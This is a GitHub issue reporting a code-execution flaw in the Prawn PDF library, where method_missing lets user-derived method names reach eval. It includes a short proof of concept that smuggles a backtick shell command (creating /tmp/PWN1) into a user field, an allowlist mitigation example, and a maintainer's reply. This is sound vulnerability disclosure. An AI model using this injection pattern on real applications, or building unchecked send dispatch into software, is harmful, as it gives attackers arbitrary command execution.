method_missing for cells and graphics enables code execution under certain prerequisites #382

felixgr opened this Issue Aug 9, 2012 · 1 comment


felixgr commented Aug 9, 2012

In cells.rb and graphics.rb you define method_missing.

If an API user of prawn derives a method name from end-user-supplied input, this can lead to attacker-controlled code execution. As a practical example, think of a web application which draws circles, lines, etc. on the PDF. The API user takes the entity from the HTTP request and uses it in a subsequent fill_and_stroke_ call.

Please refer to the example below, which creates a file /tmp/PWN1.

```ruby
require 'prawn'

Prawn::Document.generate "out.pdf" do |pdf|

  # sample 1: the intended use, a shape name chosen by the end user
  user_supplied_entity = "line"
  user_supplied_arg = [0, 200], [100, 150]

  # prawn developer code: method name derived from user input
  meth = "fill_and_stroke_#{user_supplied_entity}"
  meth_s = meth.to_sym

  pdf.send(meth_s, user_supplied_arg)

  # sample 2 (attack): the same code path reaches eval via method_missing
  user_supplied_entity = "eval"
  user_supplied_arg = "`touch /tmp/PWN1`"

  # prawn developer code
  meth = "fill_and_stroke_#{user_supplied_entity}"
  meth_s = meth.to_sym

  pdf.send(meth_s, user_supplied_arg)
end
```

I would suggest whitelisting the methods allowed to be called with send(). This check could be done in the method_missing methods of cells and graphics.
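The following is an added illustration of the whitelist the report suggests; it is not code from the issue author or from Prawn. It uses a small stand-in document class (`StubDocument`, hypothetical) whose `method_missing` forwards `fill_and_stroke_<x>` to `<x>` in the same way the report describes, and puts an unchecked dispatcher (`unsafe_draw`) next to an allowlisted one (`safe_draw`) so the difference is visible without touching a real PDF. The allowlist `ALLOWED_SHAPES` and the `DisallowedShape` error are assumptions for the example; the unchecked path is exercised with the harmless `inspect` method rather than `eval`.

```ruby
# Added example: allowlisted dispatch versus unchecked send.
# Not Prawn's code; StubDocument only mimics the dispatch pattern.

# Hypothetical allowlist of shape names an end user may choose from.
ALLOWED_SHAPES = %w[line circle].freeze

class DisallowedShape < ArgumentError; end

# Stand-in for a document object; records what was drawn.
class StubDocument
  attr_reader :drawn

  def initialize
    @drawn = []
  end

  # Stand-ins for drawing primitives; each returns a record of the call.
  def line(*points)
    @drawn << [:line, points]
    @drawn.last
  end

  def circle(center, radius)
    @drawn << [:circle, center, radius]
    @drawn.last
  end

  # Same dispatch pattern the issue describes: any fill_and_stroke_<x>
  # call is forwarded to <x>, whatever <x> happens to be.
  def method_missing(name, *args, &block)
    if name.to_s =~ /\Afill_and_stroke_(.+)\z/
      send(Regexp.last_match(1), *args, &block)
    else
      super
    end
  end

  def respond_to_missing?(name, include_private = false)
    name.to_s.start_with?("fill_and_stroke_") || super
  end
end

# Pattern from the issue: the method name is built from user input and
# handed to send without any check on what <x> is.
def unsafe_draw(doc, user_entity, *args)
  doc.send("fill_and_stroke_#{user_entity}".to_sym, *args)
end

# Mitigation the issue suggests: user input may only pick an entry from
# the allowlist; anything else is rejected before send is ever reached.
def safe_draw(doc, user_entity, *args)
  entity = user_entity.to_s
  unless ALLOWED_SHAPES.include?(entity)
    raise DisallowedShape, "shape #{entity.inspect} is not permitted"
  end
  doc.public_send(:"fill_and_stroke_#{entity}", *args)
end

if __FILE__ == $PROGRAM_NAME
  doc = StubDocument.new
  p safe_draw(doc, "line", [0, 200], [100, 150])
  # "inspect" is not a drawing method, yet the unchecked dispatcher
  # reaches it; with "eval" the same path would run attacker code.
  p unsafe_draw(doc, "inspect")
  begin
    safe_draw(doc, "eval", "irrelevant")
  rescue DisallowedShape => e
    puts "rejected: #{e.message}"
  end
end
```

The check deliberately compares the user-supplied string against a fixed list before any symbol is built, so the set of reachable methods is decided by the application rather than by whatever `method_missing` happens to forward to.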

Member

See #381, which has some performance improvements that involve re-architecting this method_missing code path. We'll revisit this issue once that refactoring is complete -- I've noted your concerns on #381.

@practicingruby practicingruby removed the stale label Mar 17, 2014